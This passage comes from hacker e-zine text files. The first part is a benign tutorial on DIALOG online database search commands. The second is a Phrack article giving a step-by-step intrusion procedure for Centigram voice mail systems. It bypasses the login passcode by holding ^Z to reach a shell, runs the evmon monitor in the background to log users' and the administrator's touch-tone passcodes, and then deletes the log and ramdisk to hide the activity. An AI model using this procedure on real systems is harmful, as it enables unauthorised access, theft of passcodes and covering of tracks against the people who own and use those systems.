98 PTS F&S Indexes 72-79
|
|
81, 83 PTS Forecasts
|
|
570 PTS MARS
|
|
16 PTS PROMPT
|
|
82, 84 PTS TIME SERIES
|
|
190 Religion Index
|
|
421-425 TEMARC
|
|
97 Rilm Abstracts
|
|
34, 87 SciSearch
|
|
94, 186 SciSearch
|
|
7 Social Scisearch
|
|
270 Soviet Science and Technology
|
|
37 Sociological Abstracts
|
|
62 SPIN
|
|
65 SSIE Current Research
|
|
132 Standard & Poor's News
|
|
133 Standard & Poor's Corporate Descriptions
|
|
526 Standard & Poor's Register-Biographical
|
|
527 Standard & Poor's Register-Corporate
|
|
113 Standards & Specifications
|
|
238 Telgen
|
|
119 Textile Technology Digest
|
|
535 Thomas Tegister On-Line
|
|
648 Trade & Industry ASAP
|
|
148 Trade & Industry Index
|
|
106,107 Trade Opportunities
|
|
226 Trademarkscan
|
|
531 Trinet Establishment Database
|
|
532 Trinet Company Database
|
|
63 TRIS
|
|
52 TSCA Initial Inventory
|
|
480 Ulrich's International Periodicals Directory
|
|
260,261 UPI NEWS
|
|
126 U.S. Exports
|
|
93 U.S. Political Science Documents
|
|
120 U.S. Public School Directory
|
|
184 Washington Post Index
|
|
117 Water Resources Abstracts
|
|
350,351 World Patents Index
|
|
67 World Textiles
|
|
185 Zoological Record
|
|
|
|
|
|
Before I continue describing the various methods of searching, DIALOG has
|
|
an on-line master index to the DIALOG databases, DIALINDEX (file 411). It is a
|
|
collection of the file indexes of most DIALOG databases (menu-driven databases
|
|
cannot be searched in DIALINDEX). DIALINDEX can be used to determine the
|
|
number of relevant records for a single query in a collection of files. The
|
|
query can be a single term, a multiple-word phrase, a prefix-coded field, or a
|
|
full logical expression of up to 240 characters. Nested terminology, proximity
|
|
operators, and truncated terms may also be used.
|
|
|
|
You can set the files you want searched by using the SET FILE command.
|
|
Like this:
|
|
|
|
BEGIN 411 (return)
|
|
|
|
SET FILE ALLNEWS (if you want the latest news on
|
|
or hack/phreak busts)
|
|
SF ALLNEWS
|
|
|
|
To scan all Subjects: SET FILES ALL
|
|
|
|
To scan specific categories:
|
|
All Science: (ALLSCIENCE)
|
|
- Agriculture & Nutrition
|
|
- Chemistry
|
|
- Computer Technology
|
|
- Energy & Environment
|
|
- Medicine & Biosciences
|
|
- Patents & Trademarks
|
|
- Science & technology
|
|
All Business: (ALLBUSINESS)
|
|
- Business Information
|
|
- Company Information
|
|
- Industry Analysis
|
|
- News
|
|
- Patents & Trademarks
|
|
All News and Current Events: (ALLNEWS)
|
|
- News
|
|
All Law & Government: (ALLLAW;ALLGOVERNMENT)
|
|
- Law & Government
|
|
- Patents & Trademarks
|
|
All Social Science & Humanities: (ALLSOCIAL;ALLHUMANITIES)
|
|
- Social Sciences & Humanities
|
|
All General Interest: (ALLGENERAL)
|
|
- Popular Information
|
|
All Reference: (ALLREFERENCE)
|
|
- Books
|
|
- Reference
|
|
All Text: (ALLTEXT)
|
|
All databases containing
|
|
complete text of:
|
|
- Journal Articles
|
|
- Encyclopedias
|
|
- Newspapers
|
|
- Newswires
|
|
All Sources: (ALLSOURCE)
|
|
- Complete Text
|
|
- Directory
|
|
- Numeric Data
|
|
All ONTAP Training Files: (ALLONTAPS)
|
|
- All On-Line Training And
|
|
Practice databases
|
|
|
|
|
|
Once you have selected a database you can now SELECT the search keyword.
|
|
You set the flag by:
|
|
|
|
SELECT term - Retrieves a set of records containing the term.
|
|
May be used with words, prefix or suffix codes, EXPAND, or
|
|
set numbers.
|
|
|
|
When defining what you are searching for you can use logical operators
|
|
such as:
|
|
|
|
OR - puts the retrieval of all search terms into one set, eliminating
|
|
duplicate records.
|
|
|
|
AND - retrieves the intersection, or overlap, of the search terms: all
|
|
terms must be in each record retrieved.
|
|
|
|
NOT - eliminates search term (or group of search terms) following it from
|
|
other search term(s).
|
|
|
|
Note: Always enter a space on either side of a logical operator.
|
|
|
|
SELECT Examples:
|
|
|
|
SELECT (BICMOS OR CMOS) AND SRAM
|
|
or
|
|
S (BICMOS OR CMOS) AND SRAM
|
|
|
|
- This would generate something like this:
|
|
138 BICMOS <- records containing BICMOS only
|
|
1378 CMOS <- records containing CMOS only
|
|
681 SRAM <- records containing SRAM only
|
|
S1 203 (BICMOS OR CMOS) AND SRAM <- this is what you
|
|
^^ wanted.
|
|
|| DIALOG names your select topic S1, S2... respectively as search its
|
|
databases to make it easier to type. The contents of S1 are 203
|
|
found records containing the keywords BICMOS, CMOS, and SRAM.
|
|
Sometimes S1 is referred to as S(tep) 1
|
|
|
|
PROXIMITY OPERATORS (Select command)
|
|
|
|
(W) Requests terms be adjacent to each other and in order
|
|
specified. -> S SOLAR(W)ENERGY
|
|
(nW) Requests terms be within (n) words of each other and in order
|
|
specified. -> S SOLAR(3W)ENERGY
|
|
(N) Requests terms be adjacent but in any order. Useful for
|
|
retrieving identical terms. -> S SOLAR(N)ENERGY
|
|
(nN) Requests terms be within (n) words of each other and in any
|
|
order. -> S SOLAR(3N)ENERGY
|
|
(F) Requests terms be in same field of same record, in any order.
|
|
-> S SOLAR(F)ENERGY
|
|
(L) Requests terms be in same descriptor unit as defined by
|
|
database. -> S SOLAR(L)ENERGY
|
|
(S) Requests terms be in same Subfield unit as defined by
|
|
database. -> S SOLAR(S)ENERGY
|
|
(C) Equivalent to logic operator AND.
|
|
-> S SOLAR(C)ENERGY
|
|
|
|
PRIORITY OF EXECUTION
|
|
|
|
Proximity operator, NOT, AND, OR
|
|
|
|
Use parentheses to specify different order of execution, e.g. SELECT (SOLAR OR
|
|
SUN) AND (ENERGY OR HEAT). Terms within parentheses are executed first.
|
|
|
|
STOP WORDS (predefined)
|
|
|
|
The following words may not be SELECTed as individual terms. The computer will
|
|
retrieve a set with zero results. They may only be replaced with proximity
|
|
operators, e.g. S GONE(2W)WIND
|
|
|
|
AN FOR THE
|
|
AND FROM TO
|
|
BY OF WITH
|
|
|
|
RESERVED WORDS AND SYMBOLS
|
|
|
|
The following words and symbols must be enclosed in quotation marks whenever
|
|
they are SELECTed as or within search terms, e.g., SELECT "OR"(W)GATE?
|
|
|
|
AND =
|
|
FROM *
|
|
NOT +
|
|
OR :
|
|
STEPS /
|
|
|
|
TRUNCATION
|
|
|
|
OPEN: any number of characters following stem.
|
|
SS EMPLOY?
|
|
RESTRICTED: only one additional character following stem.
|
|
SS HORSE? ?
|
|
RESTRICTED: maximum number of additional characters equal to
|
|
number of question marks entered. SS UNIVERS??
|
|
|
|
INTERNAL: allows character replaced by question mark to vary. One
|
|
character per question mark. SS WOM?N
|
|
|
|
|
|
BASIC INDEX FIELD SPECIFICATION (SUFFIX CODES)
|
|
|
|
Suffix codes are used to restrict retrieval to specified basic index fields of
|
|
a record. Specific fields and codes vary according to the database.
|
|
|
|
Abstract /AB
|
|
Descriptor /DE
|
|
Full Descriptor(single word) /DF
|
|
Identifier /ID
|
|
Full Identifier(single word) /IF
|
|
Title /TI
|
|
Note /NT
|
|
Section Heading /SH
|
|
|
|
Examples:
|
|
|
|
SELECT BUDGET?/TI
|
|
SELECT POP(W)TOP(W)CAN?/TI,AB
|
|
SELECT (DOLPHIN? OR PORPOISE?)/DE/ID
|
|
|
|
|
|
ADDITIONAL INDEXES (PREFIX CODES)
|
|
|
|
Prefix codes are used to search additional indexes. Specific fields and codes
|
|
vary according to the database.
|
|
|
|
Author AU=
|
|
Company Name CO=
|
|
Corporate Source CS=
|
|
Document Type DT=
|
|
Journal Name JN=
|
|
Language LA=
|
|
Publication Year PY=
|
|
Update UD=
|
|
|
|
Examples:
|
|
|
|
SELECT AU=JOHNSON, ROBERT?
|
|
SELECT LA=GERMAN
|
|
SELECT CS=(MILAN(F)ITALY)
|
|
|
|
|
|
RANGE SEARCHING
|
|
|
|
A colon is used to indicate a range of sequential entries to be retrieved in a
|
|
logical OR relationship.
|
|
|
|
Examples:
|
|
|
|
SELECT CC=64072:64078
|
|
SELECT ZP=662521:62526
|
|
|
|
|
|
LIMIT QUALIFIERS
|
|
|
|
Limit qualifiers are used in SELECT statements to limit search terms or sets to
|
|
given criteria. Specific qualifiers vary according to database.
|
|
|
|
English language documents /ENG
|
|
Major descriptor /MAJ
|
|
Patents /PAT
|
|
Human subject /HUM
|
|
Accession number range /nnnnnn-nnnnnn
|
|
|
|
Examples:
|
|
|
|
SELECT TRANSISTORS/ENG,PAT
|
|
SELECT S2/MAJ
|
|
SELECT (STRESS OR TENSION)/234567-999999
|
|
|
|
Well that's it for basic searching. Now, how to view the record you have
|
|
selected.
|
|
|
|
Note: Indexes (prefix codes) often differ from database to
|
|
database, often resulting in futile searches. One way to avoid this
|
|
is to make a trip to the local Public or University Library and look
|
|
up the blue sheets for the database you wish to query. Blue sheets
|
|
are issued by dialog as a service to their users. Blue Sheets often
|
|
contain helpful searching techniques ere to the database you are
|
|
interested in. They will also contain a list of Indexes (prefix
|
|
codes) unique to that database only.
|
|
|
|
|
|
VIEWING SEARCH RESULTS
|
|
|
|
|
|
COMMAND SUMMARY
|
|
|
|
TYPE Provides continuous on-line display of results.
|
|
T Specify set/format/range of items. If Item range is specified,
|
|
use T to view next record. May also be used with specific
|
|
accession number.
|
|
|
|
Examples: T 12/3/1-22 <- set/format/range
|
|
T 8/7 <- set/format
|
|
T 6 <- view next.(6 in this case)
|
|
T 438721 <- view record 438721
|
|
|
|
|
|
DISPLAY Provides display of results one screen at a time. Use
|
|
D PAGE for subsequent screens.
|
|
Specify set/format/range of items. If range not specified, use
|
|
D to view next record. May also be used with specific
|
|
accession number.
|
|
|
|
Examples: D 11/6/1-44 <- set/format/range
|
|
D 9/5 <- set/format
|
|
D 7 <- view next.(7 in this case)
|
|
D 637372/7 <- view record 637372/format 7
|
|
|
|
|
|
PRINT Requests that results be printed offline and mailed. Specify
|
|
set/format/range of items. If item range not specified up to
|
|
50 records will be printed. Use PR to print another 50.
|
|
|
|
Examples: PR 9/5/1-44 <- print set/format/range
|
|
PR 6/7 <- print set/format (all)
|
|
PR 14 <- print 14 only
|
|
PR 734443/5 <- print 734443 format 5 only.
|
|
|
|
|
|
PRINT TITLE xxx To specify a title(xxx) to appear on PRINTs. Title may
|
|
contain up to 70 characters. No semicolon may be used. Must
|
|
be entered in database before any other PRINT command is used.
|
|
Cancelled by next BEGIN.
|
|
|
|
Examples: PR TITLE GLOBULIN
|
|
PR TITLE QUETZAL
|
|
|
|
|
|
REPORT Extracts data from specified fields and produces tabular
|
|
format for on-line output only. Specify set/range of
|
|
items/fields. May be used with SORTED set to specify order of
|
|
entries in table. Application is database-specific.
|
|
|
|
|
|
TYPICAL FORMATS IN BIBLIOGRAPHIC FILES:
|
|
|
|
Format Number Description
|
|
1 DIALOG Accession Number
|
|
2 Full Record except Abstract
|
|
3 Bibliographic Citation
|
|
5 Full Record
|
|
6 Title
|
|
7 Bibliographic Citation and Abstract
|
|
8 Title and Indexing
|
|
|
|
NOTE: Again, the Formats differ from database to database.
|
|
See database bluesheet for specific format descriptions.
|
|
|
|
|
|
OTHER OUTPUT-RELATED COMMANDS:
|
|
|
|
PRINT CANCEL Used alone, cancels preceding PRINT command.
|
|
PR CANCEL Specify PRINT Transaction Number to cancel
|
|
PRINT- any PRINT request entered in past two hours,
|
|
PR- e.g. PRINT- P143
|
|
|
|
PRINT QUERY To view log of PRINT commands and cancellations. Add
|
|
PR QUERY DETAIL to see date, time and costs.
|
|
|
|
PRINT QUERY ACTIVE To view log of PRINT commands that may still be cancelled.
|
|
PR QUERY ACTIVE Add DETAIL to see date, time, file and costs.
|
|
|
|
SORT Sorts set of records on-line according to parameters
|
|
indicated. Varies per database. Specify set
|
|
number/range/field,sequence, e.g. SORT 4/1-55/AU,TI
|
|
Sequence assumed ascending if not specified; use D to
|
|
specify descending order. SORT parameters may be added to
|
|
end of PRINT command for offline sorting, e.g. PRINT
|
|
9/5/ALL/SD,D
|
|
|
|
SET SCREEN nn nn Sets size of screen for video display.
|
|
SET H nn H (horizontal) given first in combined command.
|
|
SET V nn V Default is 75 characters H, 40 lines V
|
|
|
|
|
|
LOGOFF Disconnects user from DIALOG system.
|
|
LOGOFF HOLD Disconnects user from DIALOG system, holds work for 10
|
|
minutes allowing RECONNECT.
|
|
|
|
|
|
OTHER COMMANDS:
|
|
|
|
DISPLAY SETS Lists all sets formed since last BEGIN command.
|
|
DS May specify range of sets, e.g. DS 10-22.
|
|
|
|
EXPLAIN Requests help messages for commands and file features.
|
|
Enter ?EXPLAIN to see complete list.
|
|
|
|
KEEP Places records indicated in special set 0. Specify
|
|
K set number/records, or accession number. Cancelled by a
|
|
BEGIN command. Also used in DIALORDER.
|
|
|
|
LIMITALL Limits all subsequent sets to criteria specified. Varies
|
|
per database.
|
|
|
|
LIMITALL/ALL Cancels previous LIMITALL command.
|
|
|
|
?LIMIT n Requests list of limit qualifiers for database n.
|
|
|
|
|
|
SEARCH*SAVE
|
|
|
|
|
|
SAVE Stores strategy permanently until deleted. Serial number
|
|
begins with S.
|
|
|
|
SAVE TEMP Stores strategy for seven days; automatically deleted.
|
|
Serial number begins with T.
|
|
|
|
SAVE SDI Stores strategy and PRINT command(s) until deleted. PRINT
|
|
command required. Automatically executes strategy against
|
|
each new update to database in which entered. Serial
|
|
number begins with D.
|
|
|
|
MAPxx Creates a Search*Save of data extracted for field xx of
|
|
MAPxx TEMP records already retrieved.
|
|
|
|
MAPxx STEPS If STEPS is used, data is formatted into separate search
|
|
statements in Search*Save.
|
|
|
|
|
|
REVIEWING SEARCH*SAVES
|
|
|
|
|
|
RECALL nnnnn Recalls Search*Save nnnnn, displaying all set-producing
|
|
commands and comment lines, without executing the search.
|
|
|
|
RECALL SAVE Displays serial numbers of all permanent SAVEs, date
|
|
entered, and number of lines.
|
|
|
|
RECALL TEMP Displays serial numbers of all temporary SAVEs, date
|
|
entered, and number of lines.
|
|
|
|
RECALL SDI Displays serial numbers of all SDIs, dates entered,
|
|
databases in which stored, and number of lines.
|
|
|
|
|
|
EXECUTING SEARCH*SAVES
|
|
|
|
|
|
EXECUTE nnnnn Executes entire strategy. Only last line is assigned a
|
|
EX nnnnn set number.
|
|
|
|
EXECUTE STEPS nnnnn Executes entire strategy. Assigns set number to each
|
|
EXS nnnnn search element. Preferred form.
|
|
|
|
EXECUTE nnnnn/x-y Executes strategy nnnnn form command line x to command line
|
|
y only. STEPS may also be used: EXS nnnnn/x-y
|
|
|
|
EXECUTE nnnnn/USER a
|
|
|
|
Executes strategy nnnnn originally entered by
|
|
user a (a=user number).
|
|
STEPS may also be used: EXS nnnnn/USER a
|
|
|
|
EXECUTE nnnnn/x-y/USER a
|
|
|
|
Executes strategy nnnnn from command line x to command line
|
|
y, originally entered by user a. STEPS may also be used:
|
|
EXS nnnnn/x-y/USER a
|
|
|
|
|
|
DELETING SEARCH*SAVES
|
|
|
|
|
|
RELEASE nnnnn Deletes search nnnnn from system.
|
|
|
|
|
|
OTHER SEARCH*SAVE OPTIONS
|
|
|
|
|
|
NAMING: A three to five alphanumerical name may be specified following the
|
|
SAVE, SAVE TEMP, and SAVE SDI commands.
|
|
Example: SAVE TEMP SOLAR
|
|
|
|
COMMENTS: An informative comment may be stored in a SEARCH*SAVE by entering an
|
|
asterisk in place of a command, followed by up to 240 characters of
|
|
"comment." The line will be saved with any SEARCH*SAVE command, and
|
|
will display in RECALL of the search.
|
|
|
|
Example: * Search for R.J.Flappjack
|
|
|
|
|
|
ON-LINE TEXT EDITOR
|
|
|
|
|
|
Any Search*Save, with the exception of an SDI, may be edited from within any
|
|
database. An SDI must be edited within the database in which the SDI is to be
|
|
stored.
|
|
|
|
EDIT To enter Editor and create new text.
|
|
EDIT xxxxx Pulls Search*Save xxxxx into Editor for editing.
|
|
|
|
LIST Displays text to be edited.
|
|
L OPTIONS:
|
|
LIST LIST 30-110
|
|
LIST ALL LIST 10,50,80
|
|
LIST /data/ Locates all lines containing data.
|
|
|
|
INSERT Adds onto end of text.
|
|
INSERT nn Inserts line nn into text.
|
|
I To return to EDIT from INSERT, enter a period on a
|
|
I nn blank line.
|
|
DELETE To delete line(s) of text.
|
|
D OPTIONS:
|
|
DELETE 10-50
|
|
DELETE 10,30-50
|
|
DELETE ALL
|
|
|
|
CHANGE To change text within a line.
|
|
C Changes only first occurrence of old text in any given line.
|
|
OPTIONS:
|
|
CHANGE 60/old/new (where 60 is line number)
|
|
CHANGE 60/old// (deletes old)
|
|
C 60//new (inserts new at beginning of line)
|
|
C 80.old.new (when text contains slash)
|
|
C /old/new (new replaces old on all lines)
|
|
C 20,40/old/new (nonsequential lines)
|
|
C 30-50/old/new (range of lines)
|
|
|
|
COPY Duplicates line# TO line#
|
|
CO OPTIONS:
|
|
COPY 100 to 255
|
|
COPY 100-150 TO 255
|
|
COPY 100,130 TO 255
|
|
|
|
MOVE Move line# TO line#
|
|
M Options same as COPY.
|
|
|
|
QUERY Produces message giving name of file, number of lines, last line
|
|
Q number.
|
|
|
|
RENUM Renumbers lines by tens unless otherwise specified.
|
|
R OPTIONS:
|
|
RENUM n (Renumbers by increments of n)
|
|
|
|
QUIT Used to leave editor ignoring session.
|
|
|
|
SAVE Used to create Search*Save strategy from edited file.
|
|
SAVE TEMP An SDI must include a PRINT command.
|
|
SAVE SDI
|
|
|
|
|
|
Enjoy the DIALOG Information Network. I've found it most interesting.
|
|
This service is a MUST if you are in college or if you just love to learn as
|
|
uch as time permits. It is a proven research tool used by R&D and university
|
|
facilities around the world, as well as a refined corporate intelligence
|
|
information gathering tool kept hidden from the general public by sheer expense
|
|
and "pseudo-complexity." With on-line databases like DIALOG available, there
|
|
is no excuse (besides lack of time) for self-education.
|
|
|
|
*****************************************************************
|
|
|
|
Brian Oblivion can be reached at Oblivion@ATDT.ORG.
|
|
|
|
Additionally, he can be reached at Black Crawling Systems/VOiD Information
|
|
Archives (for more information, e-mail Brian). RDT welcomes any questions or
|
|
comments you may have. See you at SummerCon '92.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 6 of 13
|
|
|
|
Centigram Voice Mail System Consoles
|
|
Proper Entry Procedure, Design Flaws, and Security Bugs
|
|
|
|
by >Unknown User<
|
|
|
|
*** Note from Phrack Staff: This file was submitted to Phrack anonymously. ***
|
|
*** The author used SMTP fake mail to send it to the Phrack e-mail address. ***
|
|
*** Phrack cannot make any claims about the validity or the source of the ***
|
|
*** information found in this article. ***
|
|
|
|
Due to more efficient task-handling and the desire for a more "Unix-like"
|
|
environment, the developers at Centigram needed for certain key functions to be
|
|
available at all times. For instance, the ^Z key acts as the "escape" key
|
|
(these can be remapped, if desired). When necessary for some applications to
|
|
use an "escape" procedure, pressing this key can, in at least a few cases,
|
|
cause a drop to shell, or /cmds/qnxsh (possibly /cmds/sh, as well, but I'm used
|
|
to seeing qnxsh). If this escape procedure was invoked during, say,
|
|
/cmds/login, the resulting drop to shell would by-pass the "Enter Passcode:"
|
|
message. And it does.
|
|
|
|
After calling the Centigram, normal procedure is to hit ^Z to activate the
|
|
terminal, followed by the entry of the remote or console passcodes, and then
|
|
proceeding with normal console activities. However, if ^Z is continually
|
|
depressed during the login sequence, the login program will abort and run
|
|
/cmds/qnxsh. The behavior may be somewhat erratic by the repeated use of the
|
|
escape key, but when the $ prompt appears, usually, it doesn't deliberately go
|
|
away without an "exit" command or a ^D. Typically, a login pattern can develop
|
|
to accommodate the erratic behavior something along the lines of: continuously
|
|
depress ^Z until $ prompt appears, hit return, possibly get "Enter Passcode:"
|
|
message, hit return, and $ prompt appears again, set proper TTY setting, and
|
|
change directory appropriately, and continue with normal console functions.
|
|
|
|
Initial STTY Setting:
|
|
|
|
I've had problems with my terminal settings not being set properly during
|
|
the above entry procedure. I can correct this by using the "stty +echo +edit"
|
|
command, and, for my terminal, all is restored. The correct values for STTY
|
|
options and keys appear to be:
|
|
|
|
Options: +echo +edit +etab +ers +edel +oflow +mapcr +hangup
|
|
break=03h esc=1Ah rub=7Fh can=18h eot=04h up=15h
|
|
down=0Ah left=08h ins=0Eh del=0Bh
|
|
|
|
The keymap, of course, can be modified as desired, but the options,
|
|
especially +edit, appear to be necessary.
|
|
|
|
Disks and Directories:
|
|
|
|
The drives and directories are set up in a remotely MessDos fashion. The
|
|
output of a "pwd" command looks similar to "4:/". "4:" represents the drive
|
|
number, and "/" is the start of the directory structure, "4:/" being the root
|
|
directory for drive 4, "3:/tmp" being the /tmp directory on drive 3, etc.
|
|
|
|
The two most important directories are 1:/cmds and 4:/cmds, which contain,
|
|
for the most part, the program files for all of the performable commands on the
|
|
system, excluding the commands written into the shell. The directory 1:/cmds
|
|
should look similar to:
|
|
|
|
$ ls
|
|
backup drel ls rm talk
|
|
chattr eo mkdir rmdir tcap
|
|
choose fdformat mount runfloppy timer
|
|
clrhouse files p search tsk
|
|
cp frel pack sh unpack
|
|
date get_boolean patch slay ws
|
|
ddump led pwd sleep zap
|
|
diff led.init qnxsh spatch
|
|
dinit login query stty
|
|
|
|
This is a display of many useful commands. chattr changes the read/write
|
|
file attributes, cp is copy, ddump dumps disk sectors in hex & ascii, led is
|
|
the line editor, p is the file print utility, and a variety of other things
|
|
that you can experiment with at your own leisure. DO NOT USE THE TALK COMMAND.
|
|
At least, be careful if you do. If you try to communicate with your own
|
|
terminal, it locks communication with the shell, and upon hangup, for some
|
|
reason, causes a major system error and system-wide reboot, which, quite
|
|
frankly, made me say, "Oops. I'm not doing that again" when I called to check
|
|
on the actual voice mailboxes, and the phone line just sat there, dead as old
|
|
wood. I was quite relieved that it came back up after a few minutes.
|
|
|
|
The other directory, 4:/cmds, is filled with more specific commands
|
|
pertaining to functions within the voice mail system itself. These programs
|
|
are actually run from within other programs to produce an easy-to-understand
|
|
menu system. Normally, this menu system is immediately run after the entry of
|
|
the remote or console passcode, but it would not be run when using the
|
|
aforementioned security bug. It can be run from the shell simply by typing the
|
|
name of the program, console.
|
|
|
|
Mounting and Initializing Drives:
|
|
|
|
The MOUNT command produces results similar to this when run without
|
|
arguments:
|
|
|
|
$ mount
|
|
Drive 1: Hard, 360k, offset = 256k, partition= Qnx
|
|
Drive 2: Floppy, 360k, p=1
|
|
Drive 3: RamDisk, 96k, partition= Qnx
|
|
Drive 4: Hard, 6.1M, offset = 616k, partition= Qnx
|
|
$tty0 = $con , Serial at 03F8
|
|
$tty1 = $term1 , Serial at 02F8
|
|
$tty2 = $term2 , Serial at 0420
|
|
$tty3 = $mdm , Serial at 0428
|
|
|
|
The hard and floppy drives are fairly self-explanatory, although I can't
|
|
explain why they appear to be so small, nor do I know where the voice
|
|
recordings go, or if this list contain all the space required for voice
|
|
storage.
|
|
|
|
The ramdisk, however, is a bit more interesting to me. The mount command
|
|
used for the above-mentioned disk 3 was:
|
|
|
|
$ mount ramdisk 3 s=96k -v
|
|
|
|
Although I'm not sure what the -v qualifier does, the rest is fairly
|
|
straight forward. I assume that the size of the drive can be greater than 96k,
|
|
although I haven't yet played with it to see how far it can go. To initialize
|
|
the drive, the following command was used:
|
|
|
|
$ dinit 3
|
|
|
|
Quite simple, really. Now, the drive is ready for use so one can "mkdir
|
|
3:/tmp" or some such and route files there as desired, or use it for whatever
|
|
purpose. If something is accidentally redirected to the console with >$cons,
|
|
you can use the line editor "led" to create a temporary file and then use the
|
|
print utility "p" to clear the console's screen by using "p filename >$cons"
|
|
where filename contains a clear screen of 25 lines, or an ANSI bomb (if
|
|
appropriate), or a full-screen DobbsHead or whatever you like.
|
|
|
|
EVMON and password collecting:
|
|
|
|
The evmon utility is responsible for informing the system manager about
|
|
the activity currently taking place within the voice mail system. Run alone,
|
|
evmon produces output similar to:
|
|
|
|
$ evmon
|
|
Type Ctrl-C to terminate.
|
|
ln 26 tt 3
|
|
ln 26 line break
|
|
ln 26 onhook
|
|
ln 28 ringing
|
|
ln 28 tt 8
|
|
ln 28 tt 7
|
|
ln 28 tt 6
|
|
ln 28 tt 2
|
|
ln 28 offhook
|
|
ln 28 tt *
|
|
ln 28 tt 2
|
|
ln 28 tt 0
|
|
ln 28 tt 3
|
|
ln 28 tt 0
|
|
ln 28 line break
|
|
ln 28 onhook
|
|
[...]
|
|
|
|
And so forth. This identifies a certain phone line, such as line 28, and a
|
|
certain action taking place on the line, such as the line ringing, going on or
|
|
offhook, etc. The "tt" stands for touch tone, and it is, of course, the tone
|
|
currently played on the line; which means that touchtone entry of passcodes can
|
|
be recorded and filed at will. In the above example, the passcode for Mailbox
|
|
8762 is 2030 (the * key, along with the 0 key, can acts as the "user entering
|
|
mailbox" key; it can, however, also be the abort key during passcode entry, and
|
|
other things as well). Now the user, of course, doesn't usually dial 8762 to
|
|
enter his mailbox; he simply dials the mailbox number and then * plus his
|
|
passcode; the reason for this is the type of signalling coming from the switch
|
|
to this particular business line was set-up for four digit touch tone ID to
|
|
route the line to the appropriate called number. This is not the only method
|
|
of signalling, however, as I've seen other businesses that use three digit
|
|
pulse signalling, for example, and there are others as well. Each may have
|
|
it's own eccentricities, but I would imagine that the line ID would be
|
|
displayed with EVMON in most cases.
|
|
|
|
Now, let's say we're on-line, and we want to play around, and we want to
|
|
collect passcodes. We've set up our ramdisk to normal size and we are ready to
|
|
run evmon. We could run it, sit at our terminal, and then record the output,
|
|
but it's such a time consuming task (this is "real-time," after all) that
|
|
sitting and waiting be nearly pointless. So, we use the handy features of
|
|
run-in-background and file-redirection (see, I told you we were getting
|
|
"Unix-like").
|
|
|
|
$ evmon > 3:/tmp/output &
|
|
Type Ctrl-C to terminate.
|
|
5e1e
|
|
$ ...
|
|
|
|
5e1e is the task ID (TID) of the new evmon process. Now we can go off and
|
|
perform whatever lists we want, or just play in the directories, or route
|
|
DobbsHeads or whatever. When we decide to end for the day, we simply stop
|
|
EVMON, nab the file, remove it, and if necessary, dismount the ramdisk.
|
|
|
|
$ kill 5e1e
|
|
$ p 3:/tmp/output
|
|
[ EVMON output would normally appear; if, however, ]
|
|
[ there is none, the file would be deleted during ]
|
|
[ the kill with an error message resulting ]
|
|
$ rm 3:/tmp/output
|
|
$ rmdir 3:/tmp
|
|
$ mount ramdisk 3
|
|
|
|
and now we can ^D or exit out of the shell and say good-bye.
|
|
|
|
The good thing about this EVMON procedure is that you don't need to be
|
|
on-line while it runs. You could start a task sometime at night and then wait
|
|
until the next day before you kill the process and check your results. This
|
|
usually produces large log files anywhere from 40K to 200K, depending upon the
|
|
amount of system usage (these figures are rough estimates). If, however, you
|
|
start the EVMON task and leave it running, then the administrator will not be
|
|
able to start a new EVMON session until the old task is killed. While this
|
|
probably shouldn't be a problem over the weekends, during business hours it may
|
|
become a little risky.
|
|
|
|
Remember though, that the risk might be worth it, especially if the
|
|
administrator decides to check his mailbox; you'd then have his passcode, and,
|
|
possibly, remote telephone access to system administrator functions via touch-
|
|
tone on the mailbox system.
|
|
|
|
Task management:
|
|
|
|
As we have just noted, any task like EVMON can be run in the background by
|
|
appending the command line with a &, the standard Unix "run-in-background"
|
|
character. A Task ID will echo back in hexadecimal, quite comparable to the
|
|
Unix Process ID. The program responsible for task management is called "tsk"
|
|
and should be in 1:/cmds/tsk. Output from running tsk alone should look
|
|
something like:
|
|
|
|
$ tsk
|
|
Tty Program Tid State Blk Pri Flags Grp Mem Dad Bro Son
|
|
0 task 0001 READY ---- 1 ---IPLA----- 255 255 ---- ---- ----
|
|
0 fsys 0002 RECV 0000 3 ---IPLA----- 255 255 ---- ---- ----
|
|
0 dev 0003 RECV 0000 2 ---IPLA----- 255 255 ---- ---- ----
|
|
0 idle 0004 READY ---- 15 ----PLA----- 255 255 ---- ---- 0508
|
|
0 /cmds/timer 0607 RECV 0000 2 -S--P-AC---- 255 255 ---- ---- ----
|
|
0 /cmds/err_log 0509 RECV 0000 5 -S--P--C---- 255 255 0A0A ---- ----
|
|
0 /cmds/ovrseer 0A0A REPLY 0607 5 -S--P--C---- 255 255 ---- ---- 030C
|
|
0 /cmds/recorder 010B REPLY 0509 5 -S--P--C---- 255 255 0A0A 0509 ----
|
|
0 /cmds/master 030C REPLY 0607 5 -S--P--C---- 255 255 0A0A 010B 011C
|
|
[ ... a wide assortment of programs ... ]
|
|
0 /cmds/vmemo 011C REPLY 0110 13 -S-----C---- 255 255 030C 011B ----
|
|
3 /cmds/comm 0508 RECV 5622 8 ----P-A----- 255 255 0004 ---- 5622
|
|
3 /cmds/tsk 051D REPLY 0001 8 ------------ 255 255 301E ---- ----
|
|
3 /cmds/qnxsh 301E REPLY 0001 14 ---------E-- 255 255 5622 ---- 051D
|
|
3 /cmds/login 5622 REPLY 0003 8 -------C---- 255 255 0508 ---- 301E
|
|
|
|
Although I'm not quite sure at some of the specifics displayed in this
|
|
output, the important parts are obvious. The first column is the TTY number
|
|
which corresponds to the $tty list in "mount" (meaning that the modem I've just
|
|
called is $tty3, and I am simultaneously running four tasks from that line);
|
|
the second column is the program name (without the drive specification); the
|
|
third column is the task ID; the middle columns are unknown to me; and the last
|
|
three represent the ties and relations to other tasks (parent task ID, another
|
|
task ID created from the same parent, and task ID of any program called).
|
|
|
|
Knowing this, it's easy to follow the tasks we've created since login.
|
|
Initially, task 0508, /cmds/comm, was run, which presumably contains the
|
|
requisite "what should I do now that my user has pressed a key?" functions,
|
|
which called /cmds/login to log the user in. Login was interrupted with ^Z and
|
|
one of the shells, qnxsh, was called to handle input from the user. Finally,
|
|
the typing of "tsk" requires that the /cmds/tsk program be given a task ID, and
|
|
the output of the program is simply confirming that it exists.
|
|
|
|
As mentioned, to kill a task from the shell, simply type "kill [task-id]"
|
|
where [task-id] is the four digit hexadecimal number.
|
|
|
|
There are other functions of the tsk program as well. The help screen
|
|
lists:
|
|
|
|
$ tsk ?
|
|
use: tsk [f={cmoprst}] [p=program] [t=tty] [u=userid]
|
|
tsk code [p=program]
|
|
tsk info
|
|
tsk mem t=tid
